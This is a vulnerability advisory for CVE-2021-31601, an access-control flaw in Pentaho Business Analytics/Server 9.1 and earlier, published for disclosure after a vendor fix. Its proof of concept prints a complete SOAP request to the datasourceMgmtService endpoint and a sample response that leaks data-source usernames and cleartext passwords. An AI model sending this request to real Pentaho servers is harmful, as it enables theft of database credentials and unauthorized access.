Pentaho Business Analytics / Pentaho Business Server 9.1 Insufficient Access Control

`Product: Pentaho Business Analytics / Pentaho Business Server  
Vendor / Manufacturer: Hitachi Vantara  
Affected Version(s): <= 9.1  
Vulnerability Type: Insufficient Access Control of Data Source Management  
Service  
Solution Status: Fix Released on public GitHub repository  
Manufacturer Notification: 8th February 2021  
Solution Date: May 2021  
Public Disclosure: 01 November 2021  
CVE Reference: CVE-2021-31601  
Author(s) of Advisory: Alberto Favero ( HawSec ) & Altion Malka  
  
--- ### --- ### ---  
  
Product Description:  
  
Pentaho is business intelligence (BI) software that provides data  
integration, OLAP services, reporting, information dashboards, data mining  
and extract, transform, load (ETL) capabilities. Its headquarters are in  
Orlando, Florida. Pentaho was acquired by Hitachi Data Systems in 2015 and  
in 2017 became part of Hitachi Vantara.  
  
( Source: https://en.wikipedia.org/wiki/Pentaho )  
  
--- ### --- ### ---  
  
Vulnerability Details:  
  
Pentaho implements a series of web services using the SOAP protocol to  
allow scripting interaction with the backend server. While most of the  
interfaces correctly implement ACL, the Data Source Management Service  
located at "/pentaho/webservices/datasourceMgmtService" allows  
low-privilege authenticated users to list the connection details of all  
data sources used by Pentaho.  
  
--- ### --- ### ---  
  
Proof of Concept (PoC):  
  
See Ginger ( https://github.com/HawSec/ginger )  
  
or  
  
the following HTTP calls demonstrate how an authenticated user can retrieve  
the details of all available Pentaho Data Sources including, but not  
limited to, the cleartext username and password credentials.  
  
--- ~~~ --- ~~~ ---  
POST /pentaho/webservices/datasourceMgmtService HTTP/1.1  
Host: localhost:8080  
Connection: close  
SOAPAction:  
Content-Type: text/xml;charset=UTF-8  
Cookie: JSESSIONID=01AA03014DA08209368E158FCEF0497D;  
session-expiry=1617398748958;  
server-time=1617391548958  
Content-Length: 251  
<soapenv:Envelope  
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"  
xmlns:web="http://webservices.repository.platform.pentaho.org/">  
<soapenv:Header/>  
<soapenv:Body>  
<web:getDatasources/>  
</soapenv:Body>  
</soapenv:Envelope>  
  
  
HTTP/1.1 200  
Connection: close  
Set-Cookie: session-expiry=1617398821337; Path=/  
Set-Cookie: server-time=1617391621337; Path=/  
Content-Type: text/xml;charset=utf-8  
Date: Fri, 02 Apr 2021 19:27:08 GMT  
Content-Length: 5028  
<?xml version='1.0' encoding='UTF-8'?>  
<S:Envelope xmlns:S="http://schemas.xmlsoap.org/soap/envelope/">  
<S:Body>  
<ns2:getDatasourcesResponse  
xmlns:ns2="http://webservices.repository.platform.pentaho.org/">  
<return>  
<accessType>NATIVE</accessType>  
<accessTypeValue>NATIVE</accessTypeValue>  
<changed>false</changed>  
<connectSql></connectSql>  
<connectionPoolingProperties/>  
<databaseName>pentaho-instaview</databaseName>  
<databasePort>50006</databasePort>  
<databaseType>MONETDB</databaseType>  
<forcingIdentifiersToLowerCase>false</forcingIdentifiersToLowerCase>  
<forcingIdentifiersToUpperCase>false</forcingIdentifiersToUpperCase>  
<hostname>localhost</hostname>  
<id>bb7ce3b4-8aeb-4270-a02d-8cf072338305</id>  
<initialPoolSize>5</initialPoolSize>  
<maximumPoolSize>10</maximumPoolSize>  
<name>AgileBI</name>  
<partitioned>false</partitioned>  
<password>monetdb</password>  
<quoteAllFields>false</quoteAllFields>  
<streamingResults>false</streamingResults>  
<username>monetdb</username>  
<usingConnectionPool>false</usingConnectionPool>  
<usingDoubleDecimalAsSchemaTableSeparator>false</usingDoubleDecimalAsSchemaTableSepa  
rator>  
</return>  
[...]  
[...]  
<return>  
<accessType>JNDI</accessType>  
<accessTypeValue>JNDI</accessTypeValue>  
<changed>false</changed>  
<connectSql></connectSql>  
<connectionPoolingProperties/>  
<dataTablespace></dataTablespace>  
<databaseName>PDI_Operations_Mart</databaseName>  
<databasePort>5432</databasePort>  
<databaseType>POSTGRESQL</databaseType>  
<forcingIdentifiersToLowerCase>false</forcingIdentifiersToLowerCase>  
<forcingIdentifiersToUpperCase>false</forcingIdentifiersToUpperCase>  
<hostname>localhost</hostname>  
<id>363759ae-8efe-4ade-9fdd-e7b2f58883b5</id>  
<indexTablespace></indexTablespace>  
<informixServername></informixServername>  
<initialPoolSize>0</initialPoolSize>  
<maximumPoolSize>20</maximumPoolSize>  
<name>pentaho_operations_mart</name>  
<partitioned>false</partitioned>  
<password>password</password>  
<quoteAllFields>false</quoteAllFields>  
<streamingResults>false</streamingResults>  
<username>hibuser</username>  
<usingConnectionPool>false</usingConnectionPool>  
<usingDoubleDecimalAsSchemaTableSeparator>false</usingDoubleDecimalAsSchemaTableSepa  
rator>  
</return>  
</ns2:getDatasourcesResponse>  
</S:Body>  
</S:Envelope>  
  
  
--- ~~~ --- ~~~ ---  
  
  
--- ### --- ### ---  
  
  
Credits:  
  
This vulnerability was discovered by Alberto Favero & Altion Malka  
  
--- ### --- ### ---  
  
  
  
  
--   
BlackHawk - [email protected]  
  
Experientia senum, agilitas iuvenum.  
Adversa fortiter. Dubia prudenter.  
  
  
`